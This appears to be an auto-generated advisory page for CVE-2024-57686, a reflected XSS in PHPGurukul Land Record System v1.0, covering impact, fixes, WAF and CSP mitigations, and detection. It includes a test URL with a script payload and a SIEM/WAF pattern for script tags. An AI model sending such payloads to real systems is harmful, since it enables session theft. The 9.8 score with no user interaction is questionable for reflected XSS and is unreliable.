CVE-2024-57686 – A reflected Cross-Site Scripting (XSS) vulnerab... (How to Fix)

Q: What is the severity of CVE-2024-57686?

CVE-2024-57686 has a CVSS score of 9.8 (CRITICAL). A reflected Cross-Site Scripting (XSS) vulnerability in PHPGurukul Land Record System v1.0 allows remote attackers to inject malicious scripts via the 'pagetitle' parameter in the contactus.php admin page. This enables execution of arbitrary JavaScript in victims' browsers, potentially compromising admin sessions and system integrity. Organizations using this specific version of the land record system are affected.

📋 TL;DR

A reflected Cross-Site Scripting (XSS) vulnerability in PHPGurukul Land Record System v1.0 allows remote attackers to inject malicious scripts via the 'pagetitle' parameter in the contactus.php admin page. This enables execution of arbitrary JavaScript in victims' browsers, potentially compromising admin sessions and system integrity. Organizations using this specific version of the land record system are affected.

💻 Affected Systems

Products:

PHPGurukul Land Record System

Versions: v1.0

Operating Systems: Any OS running PHP

Default Config Vulnerable: ⚠️ Yes

Notes: The vulnerability exists in the default installation and requires no special configuration to be exploitable.

📦 What is this software?

Land Record System by Phpgurukul

View all CVEs affecting Land Record System →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers could steal admin session cookies, perform administrative actions, deface the website, or redirect users to malicious sites, potentially leading to full system compromise.

🟠

Likely Case

Session hijacking of admin accounts leading to unauthorized data access, modification of land records, or installation of backdoors.

🟢

If Mitigated

Limited impact if proper input validation and output encoding are implemented, though some risk remains from social engineering attacks.

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

The vulnerability is in an admin page but appears to be accessible without authentication based on the file path. Public proof-of-concept documentation exists.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: Not available

Restart Required: No

Instructions:

No official patch available. Implement input validation and output encoding in /landrecordsys/admin/contactus.php for the 'pagetitle' parameter.

🔧 Temporary Workarounds

Input Validation and Sanitization

all

Add server-side validation to sanitize the 'pagetitle' parameter before processing.

Modify contactus.php to include: $pagetitle = htmlspecialchars($_GET['pagetitle'], ENT_QUOTES, 'UTF-8');

Web Application Firewall (WAF) Rules

all

Deploy WAF rules to block XSS payloads targeting the pagetitle parameter.

Add WAF rule: Block requests containing <script> tags or javascript: in pagetitle parameter

🧯 If You Can't Patch

Restrict access to /landrecordsys/admin/ directory using IP whitelisting or authentication.
Implement Content Security Policy (CSP) headers to mitigate XSS impact.

🔍 How to Verify

Check if Vulnerable:

Test by accessing /landrecordsys/admin/contactus.php?pagetitle=<script>alert('XSS')</script> and check if script executes.

Check Version:

Check system documentation or configuration files for version information.

Verify Fix Applied:

After implementing fixes, test with same payload to ensure script does not execute and input is properly sanitized.

📡 Detection & Monitoring

Log Indicators:

HTTP requests to contactus.php with script tags or encoded payloads in pagetitle parameter
Unusual admin activity following XSS payload requests

Network Indicators:

HTTP GET requests containing malicious script patterns in query parameters
Unexpected redirects from the contactus.php page

SIEM Query:

source="web_logs" AND uri="/landrecordsys/admin/contactus.php" AND (query CONTAINS "<script>" OR query CONTAINS "javascript:")

📊 Metadata

CVE ID: CVE-2024-57686

CVSS v3 Score: 9.8 (CRITICAL)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-79

EPSS Score: 2.12% exploit probability (83.8th percentile)

Published: January 10, 2025

Last Updated: March 28, 2025

🔗 References

https://github.com/Santoshcyber1/CVE-wirteup/blob/main/Phpgurukul/Land%20record/Reflected%20Cross%20Site%20Scripting.pdf Exploit,Third Party Advisory
https://github.com/lhRaMk7/notebook/blob/main/phar_rce Broken Link

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2024-57686, you might also want to check these: